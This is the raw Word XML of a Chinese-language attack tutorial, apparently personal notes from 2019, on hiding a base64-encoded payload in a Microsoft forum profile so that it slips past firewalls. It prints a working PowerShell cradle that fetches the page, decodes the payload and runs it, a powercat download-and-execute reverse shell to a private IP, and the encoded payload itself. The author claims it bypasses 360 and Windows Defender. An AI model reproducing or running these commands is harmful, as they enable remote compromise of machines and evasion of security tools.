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center"/>
        <w:textAlignment w:val="baseline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46"/>
          <w:szCs w:val="4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63"/>
          <w:szCs w:val="63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63"/>
          <w:szCs w:val="63"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/use-microsoft-com-domains-bypass-firewalls-execute-payloads-0196505/"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63"/>
          <w:szCs w:val="63"/>
          <w:u w:val="none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63"/>
          <w:szCs w:val="63"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>使用Microsoft.com域绕过防火墙并执行有效负载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63"/>
          <w:szCs w:val="63"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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参考文章：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"https://www.ggsec.cn/microsoft-backdoor.html"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https://www.ggsec.cn/microsoft-backdoor.html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"https://null-byte.wonderhowto.com/how-to/use-microsoft-com-domains-bypass-firewalls-execute-payloads-0196505/"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https://null-byte.wonderhowto.com/how-to/use-microsoft-com-domains-bypass-firewalls-execute-payloads-0196505/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先去微软论坛注册个号，然后插入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base64 编码的payload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"https://social.msdn.microsoft.com/"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https://social.msdn.microsoft.com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2880" cy="29654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Base64编码的命令，并删去换行符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 '%s' "&lt;payload&gt;" | base64 | tr -d '\n' //删除\n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执行powershell command反弹shell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$wro = iwr -Uri https://social.msdn.microsoft.com/Profile/haq5201314 -UseBasicParsing;$r = [Regex]::new("(?&lt;=START)(.*)(?=END)");$m = $r.Match($wro.rawcontent);if($m.Success){ $p = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($m.value));iex $p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Powershell代码拆分说明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$wro = iwr -Uri https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1 -UseBasicParsing; -&gt;请求url获取源码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 = Regex::new("(?&lt;=START)(.*)(?=END)"); -&gt;正则表达式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 = $r.Match($wro.rawcontent);-&gt;正则匹配，创建变量m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if($m.Success){ $p = System.Text.Encoding::UTF8.GetString(System.Convert::FromBase64String($m.value)); ...} -&gt;如果匹配到正则，解码base64赋值为$p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iex $p-&gt;执行payload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这里执行的命令是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.241.145 -p 4444 -e cmd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Base64编码之后就是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STARTSUVYIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jlc2ltb3JoaW5vL3Bvd2VyY2F0L21hc3Rlci9wb3dlcmNhdC5wczEnKTtwb3dlcmNhdCAtYyAxOTIuMTY4LjI0MS4xNDUgLXAgNDQ0NSAtZSBjbWQgEND</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="262191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2467610"/>
            <wp:effectExtent l="0" t="0" r="165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Powershell command执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3206115"/>
            <wp:effectExtent l="0" t="0" r="571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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tm卡住了，日狗了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="956310"/>
            <wp:effectExtent l="0" t="0" r="88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反弹成功如下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419100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PS：有几率会失败，如果失败的话就换别的操作，比如什么hta。或者直接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IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.241.145 -p 5555 -e cmd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PS:如果在测试中遇见powercat卡住的情况，多试几次就好。这方法能过360和Defender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整个payload的执行过程是：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请求存放paylo</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ad的网页-&gt;获取payload部分-&gt;base64解码-&gt;执行payload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31" w:lineRule="atLeast"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="baseline"/>
      <w:rPr>
        <w:rFonts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</w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="default"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  <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="default"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  <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/use-microsoft-com-domains-bypass-firewalls-execute-payloads-0196505/" </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="default"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  <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="6"/>
        <w:rFonts w:hint="default"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  <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
      <w:t>使用Microsoft.com域绕过防火墙并执行有效负载</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="sans-serif" w:hAnsi="sans-serif" w:eastAsia="sans-serif" w:cs="sans-serif"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:caps w:val="0"/>
        <w:color w:val="000000"/>
        <w:spacing w:val="0"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/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E7692"/>
    <w:rsid w:val="12DE7692"/>
    <w:rsid w:val="1824047B"/>
    <w:rsid w:val="7E8A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:creator>L</dc:creator>
  <cp:lastModifiedBy>L</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-12T15:39:10Z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